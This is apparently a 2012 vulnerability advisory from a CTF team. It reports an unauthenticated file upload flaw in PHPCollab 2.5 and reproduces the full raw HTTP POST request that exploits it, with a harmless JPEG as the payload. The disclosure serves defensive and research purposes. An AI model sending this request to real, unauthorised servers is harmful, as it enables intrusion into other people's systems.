PHPCollab version 2.5 suffers from an unauthenticated file upload vulnerability.
b659409d571a68a9b67a3701abfc25188156d0e9e9e283e902fe7b44fa58cec0
# Exploit Title: phpcollab upload files without any authentication
# Date: 3/5/2012
# Author: team ' and 1=1--
# Software Link: http://www.phpcollab.com/
# Version: 2.5
# Vulnerability was found during the AthCon IT Security Conference CTF
# CTF Organizer: echothrust
During AthCon CTF the team ' and 1=1-- discovered that phpcollab
allows malicious users to upload files without any authentication on
the system by conducting the
following POST request:
POST
/phpcollab/projects_site/uploadfile.php?PHPSESSID=f2bb0a2008d0791d1ac45a8a3
8e51ed2&action=add&project=&task= HTTP/1.1
Host: 192.0.0.2
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:9.0.1)
Gecko/20100101 Firefox/9.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
DNT: 1
Proxy-Connection: keep-alive
Cookie: PHPSESSID=6cvltmkam146ncp3hfbucumfk6
Referer: http://192.0.0.2/
Content-Type: multipart/form-data;
boundary=---------------------------19548990971636807826563613512
Content-Length: 29914
-----------------------------19548990971636807826563613512
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000000
-----------------------------19548990971636807826563613512
Content-Disposition: form-data; name="maxCustom"
-----------------------------19548990971636807826563613512
Content-Disposition: form-data; name="commentsField"
Hello there
-----------------------------19548990971636807826563613512
Content-Disposition: form-data; name="upload"; filename="filename.jpg"
Content-Type: image/jpeg
file data stripped
-----------------------------19548990971636807826563613512
Content-Disposition: form-data; name="submit"
Save
-----------------------------19548990971636807826563613512--
As an example we uploaded the following image on the web server:
http://192.0.0.2/phpcollab/files/1--stallowned.jpg
It must be noted that the application does not allow the uploading of php
files by checking the filename extension.